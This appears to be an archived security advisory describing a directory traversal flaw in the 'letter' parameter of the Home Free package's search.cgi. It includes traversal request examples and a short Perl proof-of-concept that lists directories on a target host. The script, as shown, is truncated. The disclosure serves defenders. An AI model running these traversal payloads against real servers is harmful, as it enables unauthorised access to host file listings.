Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: httpd81.htm

Search.cgi Directory traversal vulnerability


Affected Home Free CGI package


    Following   is    based   on    #!/bin/csh   security    advisory.  is  a  vendor  of  Perl  CGI  scripts for all
    platforms that  support the  language (WinNT,  Linux, various Unix
    flavors).   Home  Free  is  a  package  developed  and marketed by, below is an extract from their website.

        "Home  Free  is  the  ultimate  community  building   program.
        Allowing you  to give  your visitors  a free  web site on your
        server.  With complete control over every aspect of your  free
        web site program, you can  grow page views, revenue and  brand
        awareness for your site."

    Home Free is used  by many popular websites.   It allows users  to
    set up and maintain their websites through a series of CGI scripts
    without posing a threat to system security.  Home Free consists of
    the following files from an end-user point of view:


    There are also  various 'admin' CGI  scripts in the  package, such


    The search.cgi script uses the following input variables:

        letter=any string
        cata=any string
        perpage=any string
        start=any string

    This CGI script can be exploited to view directory listings on the
    host  server.   A  vulnerability  exists  because  of insufficient
    bounds checking  of the  'letter' variable  when it  is parsed  by
    the search.cgi script, for example:\..\..\..\winnt

    The above URL  will list the  \winnt directory of  the host.   The
    search.cgi script also  seems to read  and display the  first line
    of  each  file  (network.wri,  et  al).   Those  who  found   this
    vulnerability have  been unable  to use  the search.cgi  script or
    any of the other scripts in the package to view files to date.

    You can  also exploit  the vulnerability  to view  other directory
    listings, such as the /cgi-bin directory under Apache.\..\..\..\apache\cgi-bin

    #!/bin/csh also took  the time in  writing a short  Perl script to
    display the directory listings of vulnerable servers:

    # Quick exploit of the Home Free ./search.cgi script, allows you to list
    # directories on the host.
    # Default server is antionline's, change as appropriate.
    use IO::Socket;
    if ($ARGV[0] eq "") { die "no argument\n"; }
    $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                  PeerAddr  => "",
                                  PeerPort  => 80) ||
                    die "can't connect to host: $!";
    $| = 1;
    print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";
    while(<$asoc>) {
            if ($_ =~ /.+HREF.+TD.+/) {
                    @parts = split("\"", $_);
                    $foo = $parts[1];
                    @parts = split("/", $foo);
                    print STDOUT $parts[3];
                    print STDOUT "\n";

    Other smaller  problems were  identified when  testing the  bounds
    checking  and   flexibility  of   the  other   scripts,  such   as
    user_manage.cgi.  Without  access to the  source code of  the Perl
    scripts in  question, it  is very  difficult to  know the security
    implications of such problems.


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH